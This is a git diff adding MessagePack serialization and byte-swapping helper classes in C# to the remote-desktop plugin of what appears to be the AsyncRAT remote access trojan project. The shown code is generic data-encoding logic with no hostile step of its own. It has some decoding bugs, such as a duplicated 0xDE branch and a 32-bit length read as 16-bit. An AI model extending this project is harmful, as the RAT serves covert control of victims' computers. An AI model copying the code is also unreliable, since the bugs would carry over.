+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
